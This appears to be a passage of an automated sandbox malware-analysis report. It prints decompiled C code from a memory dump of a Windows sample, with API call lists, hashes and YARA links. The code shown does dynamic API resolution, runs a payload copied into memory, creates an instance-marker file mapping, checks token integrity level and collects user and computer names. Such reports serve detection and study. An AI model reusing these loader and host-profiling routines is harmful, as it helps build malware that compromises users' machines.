                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000), ref: 033F38DA
                                                                                  • CloseHandle.KERNEL32(?), ref: 033F38E9
                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 033F3923
                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,033F7A05), ref: 033F3939
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033F3944
                                                                                    • Part of subcall function 033F4C46: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05F29328,00000000,?,73BCF710,00000000,73BCF730), ref: 033F4C95
                                                                                    • Part of subcall function 033F4C46: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05F29360,?,00000000,30314549,00000014,004F0053,05F2931C), ref: 033F4D32
                                                                                    • Part of subcall function 033F4C46: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,033F3858), ref: 033F4D44
                                                                                  • GetLastError.KERNEL32 ref: 033F3956
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3521023985-0
                                                                                  • Opcode ID: aa7816d6f8f033982ee5d8bb7f23e54127f3c86ecc9b5cf0c022f76186e3f887
                                                                                  • Instruction ID: 268e539b33655c6fc3e4becd72204f1985753233c85ba4b531b46b3f0cec6356
                                                                                  • Opcode Fuzzy Hash: aa7816d6f8f033982ee5d8bb7f23e54127f3c86ecc9b5cf0c022f76186e3f887
                                                                                  • Instruction Fuzzy Hash: B6515A75801229BFDF10EF95DCC4AEEBFBCEF09360F944116E610A6198D7788A44CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F7E3F, Relevance: 15.1, APIs: 10, Instructions: 111librarymemoryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 61%
                                                                                  			E033F7E3F(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E033F40AF(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0x33fd218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0x33fd230; // 0x2b2a5a8
					_t18 = _t49 + 0x33fe55b; // 0x73797325
					_t51 = E033FA590(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0x33fd230; // 0x2b2a5a8
						_t20 = _t52 + 0x33fe73d; // 0x5f28ce5
						_t21 = _t52 + 0x33fe0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x33fd1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E033F4C31(_t74);
				goto L12;
			}




















                                                                                  0x033f7e48
                                                                                  0x033f7e48
                                                                                  0x033f7e56
                                                                                  0x033f7e5f
                                                                                  0x033f7e62
                                                                                  0x033f7f77
                                                                                  0x033f7f7e
                                                                                  0x033f7f7e
                                                                                  0x033f7e71
                                                                                  0x033f7e7c
                                                                                  0x033f7e81
                                                                                  0x033f7e84
                                                                                  0x033f7e99
                                                                                  0x033f7e9f
                                                                                  0x033f7ea0
                                                                                  0x033f7ea3
                                                                                  0x033f7ea9
                                                                                  0x033f7eac
                                                                                  0x033f7eb1
                                                                                  0x033f7eb9
                                                                                  0x033f7ec0
                                                                                  0x033f7ec7
                                                                                  0x033f7eca
                                                                                  0x033f7f5e
                                                                                  0x033f7ed0
                                                                                  0x033f7ed0
                                                                                  0x033f7ed5
                                                                                  0x033f7edc
                                                                                  0x033f7ef0
                                                                                  0x033f7ef4
                                                                                  0x033f7f45
                                                                                  0x033f7ef6
                                                                                  0x033f7ef6
                                                                                  0x033f7efd
                                                                                  0x033f7f04
                                                                                  0x033f7f1c
                                                                                  0x033f7f22
                                                                                  0x033f7f26
                                                                                  0x033f7f40
                                                                                  0x033f7f28
                                                                                  0x033f7f31
                                                                                  0x033f7f36
                                                                                  0x033f7f36
                                                                                  0x033f7f26
                                                                                  0x033f7f56
                                                                                  0x033f7f56
                                                                                  0x033f7eca
                                                                                  0x033f7f65
                                                                                  0x033f7f6e
                                                                                  0x033f7f72
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 033F40AF: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,033F7E5B,?,?,?,?,00000000,00000000), ref: 033F40D4
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,7243775A), ref: 033F40F6
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,614D775A), ref: 033F410C
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 033F4122
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 033F4138
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 033F414E
                                                                                  • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 033F7E71
                                                                                  • memset.NTDLL ref: 033F7EAC
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,033F3592,73797325), ref: 033FA5A1
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 033FA5BB
                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,05F28CE5,73797325), ref: 033F7EE3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 033F7EEA
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F7F04
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F7F22
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 033F7F31
                                                                                  • CloseHandle.KERNEL32(?), ref: 033F7F36
                                                                                  • GetLastError.KERNEL32 ref: 033F7F3A
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F7F56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Wow64$Handle$CloseEnableEnvironmentExpandModuleRedirectionStrings$ChangeErrorFindFreeHeapLastNotificationmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 2409638872-0
                                                                                  • Opcode ID: 310c20d8050b759925dafd10ba390a96ce3beb536aca7ab1832b0e11fe336d3b
                                                                                  • Instruction ID: 944f2705e6b327f63934220e7c3bf722beac03778ac36bb9d891dd4d559e38c2
                                                                                  • Opcode Fuzzy Hash: 310c20d8050b759925dafd10ba390a96ce3beb536aca7ab1832b0e11fe336d3b
                                                                                  • Instruction Fuzzy Hash: 17413776901219BFCB11EFA4DC88DDEBFBCEF08380F504161E615A7124D775AA45DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F12E8, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 74%
                                                                                  			E033F12E8(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L033FAEDA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x33fd230; // 0x2b2a5a8
				_t5 = _t13 + 0x33fe84d; // 0x5f28df5
				_t6 = _t13 + 0x33fe580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L033FABFA();
				_t17 = CreateFileMappingW(0xffffffff, 0x33fd234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                  0x033f12e8
                                                                                  0x033f12f0
                                                                                  0x033f12f4
                                                                                  0x033f12fa
                                                                                  0x033f12ff
                                                                                  0x033f1304
                                                                                  0x033f1307
                                                                                  0x033f130a
                                                                                  0x033f130f
                                                                                  0x033f1310
                                                                                  0x033f1313
                                                                                  0x033f1318
                                                                                  0x033f131f
                                                                                  0x033f1329
                                                                                  0x033f132b
                                                                                  0x033f132c
                                                                                  0x033f132f
                                                                                  0x033f134b
                                                                                  0x033f1351
                                                                                  0x033f1355
                                                                                  0x033f13a3
                                                                                  0x033f1357
                                                                                  0x033f1364
                                                                                  0x033f1374
                                                                                  0x033f137c
                                                                                  0x033f138e
                                                                                  0x033f1392
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f137e
                                                                                  0x033f1381
                                                                                  0x033f1386
                                                                                  0x033f1388
                                                                                  0x033f1388
                                                                                  0x033f1366
                                                                                  0x033f1368
                                                                                  0x033f1394
                                                                                  0x033f1395
                                                                                  0x033f1395
                                                                                  0x033f1364
                                                                                  0x033f13aa

                                                                                  APIs
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,033F7881,?,00000001,?), ref: 033F12F4
                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 033F130A
                                                                                  • _snwprintf.NTDLL ref: 033F132F
                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,033FD234,00000004,00000000,00001000,?), ref: 033F134B
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881,?), ref: 033F135D
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 033F1374
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881), ref: 033F1395
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881,?), ref: 033F139D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1814172918-0
                                                                                  • Opcode ID: a61c987956156e934b03a70d52735f80432689bfd9132fc0e5d42de805636e8b
                                                                                  • Instruction ID: db37c0cea0cb824b84bf0310afe834ea5069dca80b8cb7eead5645fe688255d6
                                                                                  • Opcode Fuzzy Hash: a61c987956156e934b03a70d52735f80432689bfd9132fc0e5d42de805636e8b
                                                                                  • Instruction Fuzzy Hash: 2621F076A40208FFD710EB94DC89F9D77ADEB44710FA40122FB05EB1C0D670D5068B60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F77EB, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 64%
                                                                                  			E033F77EB(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E033F8B76();
				if(_t27 != 0) {
					_t77 =  *0x33fd214; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x33fd214 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x33fd134(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E033F82D9( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x33fd230; // 0x2b2a5a8
					_push(0x33fd238);
					_push(1);
					_t7 = _t32 + 0x33fe5bc; // 0x4d283a53
					 *0x33fd234 = 0xc;
					 *0x33fd23c = 0;
					L033F73FE();
					_t36 = E033F12E8(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E033FA12A(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E033F75C4(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x33fd230; // 0x2b2a5a8
								_t18 = _t64 + 0x33fe916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x33fd288 = _t87;
						}
						_t38 = E033FA667();
						 *0x33fd228 =  *0x33fd228 ^ 0xe8fa7dd7;
						 *0x33fd278 = _t38;
						_t39 = E033F75C4(0x60);
						__eflags = _t39;
						 *0x33fd2dc = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x33fd2dc; // 0x5f29630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x33fd2dc; // 0x5f29630
							 *_t56 = 0x33fe882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x33fd1f0, _t84, 0x52);
							__eflags = _t42;
							 *0x33fd270 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x33fd214; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x33fd230; // 0x2b2a5a8
								_t19 = _t76 + 0x33fe212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x33fc2bf);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E033FA12A( ~_v8 &  *0x33fd228, 0x33fd00c); // executed
								_t84 = E033F58CA(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E033F7098(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E033F37CA(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E033F8BA5(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x33fd130(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E033F3267(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                                                                  0x033f77eb
                                                                                  0x033f77f6
                                                                                  0x033f77f9
                                                                                  0x033f77fc
                                                                                  0x033f77ff
                                                                                  0x033f7806
                                                                                  0x033f7808
                                                                                  0x033f7814
                                                                                  0x033f7816
                                                                                  0x033f7816
                                                                                  0x033f781f
                                                                                  0x033f7827
                                                                                  0x033f782a
                                                                                  0x033f7844
                                                                                  0x033f7849
                                                                                  0x033f784a
                                                                                  0x033f784c
                                                                                  0x033f7851
                                                                                  0x033f7856
                                                                                  0x033f7858
                                                                                  0x033f785f
                                                                                  0x033f7869
                                                                                  0x033f786f
                                                                                  0x033f787c
                                                                                  0x033f7883
                                                                                  0x033f7888
                                                                                  0x033f7888
                                                                                  0x033f7891
                                                                                  0x033f78ba
                                                                                  0x033f78bd
                                                                                  0x033f78ca
                                                                                  0x033f78d1
                                                                                  0x033f78dd
                                                                                  0x033f78df
                                                                                  0x033f78e1
                                                                                  0x033f78e6
                                                                                  0x033f78ec
                                                                                  0x033f78f2
                                                                                  0x033f78f8
                                                                                  0x033f78fb
                                                                                  0x033f7900
                                                                                  0x033f7908
                                                                                  0x033f790a
                                                                                  0x033f790a
                                                                                  0x033f790d
                                                                                  0x033f790d
                                                                                  0x033f7913
                                                                                  0x033f7918
                                                                                  0x033f7920
                                                                                  0x033f7925
                                                                                  0x033f792a
                                                                                  0x033f792c
                                                                                  0x033f7931
                                                                                  0x033f7960
                                                                                  0x033f7933
                                                                                  0x033f7938
                                                                                  0x033f793d
                                                                                  0x033f7942
                                                                                  0x033f7949
                                                                                  0x033f794f
                                                                                  0x033f7954
                                                                                  0x033f795a
                                                                                  0x033f795a
                                                                                  0x033f7961
                                                                                  0x033f7963
                                                                                  0x033f7972
                                                                                  0x033f7978
                                                                                  0x033f797a
                                                                                  0x033f797f
                                                                                  0x033f79ab
                                                                                  0x033f7981
                                                                                  0x033f7981
                                                                                  0x033f7987
                                                                                  0x033f7994
                                                                                  0x033f799a
                                                                                  0x033f799a
                                                                                  0x033f79a2
                                                                                  0x033f79a4
                                                                                  0x033f79ac
                                                                                  0x033f79ae
                                                                                  0x033f79b5
                                                                                  0x033f79c2
                                                                                  0x033f79cc
                                                                                  0x033f79ce
                                                                                  0x033f79d0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f79d2
                                                                                  0x033f79d7
                                                                                  0x033f79d9
                                                                                  0x033f79e0
                                                                                  0x033f79e4
                                                                                  0x033f79e7
                                                                                  0x033f79fc
                                                                                  0x033f7a00
                                                                                  0x033f7a05
                                                                                  0x00000000
                                                                                  0x033f7a05
                                                                                  0x033f79e9
                                                                                  0x033f79eb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f79ed
                                                                                  0x033f79f6
                                                                                  0x033f79f8
                                                                                  0x033f79fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f79fa
                                                                                  0x033f79dd
                                                                                  0x033f79dd
                                                                                  0x033f79ae
                                                                                  0x033f7893
                                                                                  0x033f7893
                                                                                  0x033f7898
                                                                                  0x033f7a07
                                                                                  0x033f7a0b
                                                                                  0x033f7a13
                                                                                  0x033f7a13
                                                                                  0x00000000
                                                                                  0x033f7a0b
                                                                                  0x033f789e
                                                                                  0x033f78a1
                                                                                  0x033f78a1
                                                                                  0x033f78a3
                                                                                  0x033f78a6
                                                                                  0x033f78ae
                                                                                  0x033f78b5
                                                                                  0x00000000
                                                                                  0x033f7a1b
                                                                                  0x033f7a1b
                                                                                  0x033f7a1e
                                                                                  0x033f7a23
                                                                                  0x033f7a23

                                                                                  APIs
                                                                                    • Part of subcall function 033F8B76: GetModuleHandleA.KERNEL32(4C44544E,00000000,033F7804,00000000,00000000,00000000,?,?,?,?,?,033F87DD,?,00000001), ref: 033F8B85
                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,033FD238,00000000), ref: 033F786F
                                                                                  • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,033F87DD,?,00000001), ref: 033F7888
                                                                                  • wsprintfA.USER32 ref: 033F7908
                                                                                  • memset.NTDLL ref: 033F7938
                                                                                  • RtlInitializeCriticalSection.NTDLL(05F295F0), ref: 033F7949
                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 033F7972
                                                                                  • wsprintfA.USER32 ref: 033F79A2
                                                                                    • Part of subcall function 033FA12A: GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA161
                                                                                    • Part of subcall function 033FA12A: RtlAllocateHeap.NTDLL(00000000,033F79C7), ref: 033FA178
                                                                                    • Part of subcall function 033FA12A: GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA185
                                                                                    • Part of subcall function 033FA12A: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,033F79C7,?,?,?,?,?,033F87DD,?,00000001), ref: 033FA1A6
                                                                                    • Part of subcall function 033FA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1CD
                                                                                    • Part of subcall function 033FA12A: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 033FA1E1
                                                                                    • Part of subcall function 033FA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1EE
                                                                                    • Part of subcall function 033FA12A: HeapFree.KERNEL32(00000000,00000000), ref: 033FA20C
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2910951584-0
                                                                                  • Opcode ID: 64c6782a96fa2899a7a88dba97bbca498d61618690aa70b26a17a0737b4b1809
                                                                                  • Instruction ID: 96b7d9767d3aebf0a6cf71939643d1923de57baa6193d4879dbb3b48efcf171c
                                                                                  • Opcode Fuzzy Hash: 64c6782a96fa2899a7a88dba97bbca498d61618690aa70b26a17a0737b4b1809
                                                                                  • Instruction Fuzzy Hash: FC511771D40205AFDB21EB68DCC8FAEB7BCEB08390FC50515EA04EB248D775D9018BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F9FC0, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F9FC0(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x33fd214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E033F75C4(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E033F4C31(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                  0x033f9fcd
                                                                                  0x033f9fd4
                                                                                  0x033f9fdb
                                                                                  0x033f9fef
                                                                                  0x033f9ffa
                                                                                  0x033fa012
                                                                                  0x033fa01f
                                                                                  0x033fa022
                                                                                  0x033fa027
                                                                                  0x033fa032
                                                                                  0x033fa036
                                                                                  0x033fa045
                                                                                  0x033fa049
                                                                                  0x033fa065
                                                                                  0x033fa065
                                                                                  0x033fa069
                                                                                  0x033fa069
                                                                                  0x033fa06e
                                                                                  0x033fa072
                                                                                  0x033fa078
                                                                                  0x033fa079
                                                                                  0x033fa080
                                                                                  0x033fa086

                                                                                  APIs
                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 033F9FF2
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 033FA012
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 033FA022
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 033FA072
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 033FA045
                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 033FA04D
                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 033FA05D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1295030180-0
                                                                                  • Opcode ID: 2eb26b84f23e657da9a2e467d96a7cf4298237cad83e1f396404fb04449120cb
                                                                                  • Instruction ID: e1724c9fc989406fc5d393966a8ef5481b875629546415919523f4cf70f4c67d
                                                                                  • Opcode Fuzzy Hash: 2eb26b84f23e657da9a2e467d96a7cf4298237cad83e1f396404fb04449120cb
                                                                                  • Instruction Fuzzy Hash: 34213D7590020EFFEB10EFA4DC84EEEBBBDEB04304F4400A5EA10A6255C7759A45EF60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F492B, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 033F496C
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 033F49EE
                                                                                  • StrStrIW.SHLWAPI(00000000,006E0069), ref: 033F4A2D
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F4A4F
                                                                                    • Part of subcall function 033F14BD: SysAllocString.OLEAUT32(033FC2C8), ref: 033F150D
